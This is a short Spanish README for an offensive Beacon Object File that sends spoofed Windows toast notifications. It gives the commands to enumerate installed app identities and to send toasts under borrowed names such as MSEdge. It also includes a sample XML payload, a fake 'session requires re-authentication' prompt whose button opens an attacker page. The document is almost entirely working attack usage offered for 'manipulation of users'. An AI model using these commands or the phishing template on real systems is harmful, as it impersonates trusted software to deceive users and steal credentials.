
abusando de las notificaciones toast de Windows para diversión y manipulación de usuarios
Un archivo de objeto Beacon (BOF) para enviar notificaciones emergentes de Windows. Se complementa con la entrada del blog para contexto completo y casos de uso.
Enumera los AUMID (IDs de modelo de usuario de aplicación) registrados en el sistema. Úsalo para encontrar una identidad adecuada para tomar prestada antes de enviar un toast.
inline-execute toastnotify.o go getaumid
Ejemplo de salida:
[Notifications\Settings - HKCU]
Microsoft.Windows.Explorer
MSEdge
com.squirrel.AnthropicClaude.claude
...
[Notifications\Settings - HKLM]
...
com.squirrel.AnthropicClaude.claude
...
Envía una notificación toast estándar con un título y texto del cuerpo. Construye el XML internamente usando ToastGeneric.
inline-execute toastnotify.o go sendtoast "MSEdge" "Title" "Notification body"
Envía un toast desde un payload XML arbitrario codificado en base64. Aquí es donde ocurren las cosas interesantes con soporte completo de plantillas: acciones, enlaces de protocolo, imágenes, barras de progreso, entradas de selección, imágenes hero. ¡Y hay una aplicación para eso!
inline-execute toastnotify.o go custom "MSEdge" "<base64-encoded-xml>"
Ejemplo de payload antes de codificar:
<toast>
<visual>
<binding template="ToastGeneric">
<text>Action Required</text>
<text>Your session requires re-authentication. Click to continue.</text>
</binding>
</visual>
<actions>
<action content="Continue"
activationType="protocol"
arguments="https://your-page-here.com"/>
</actions>
</toast>
Codifícalo y disfruta.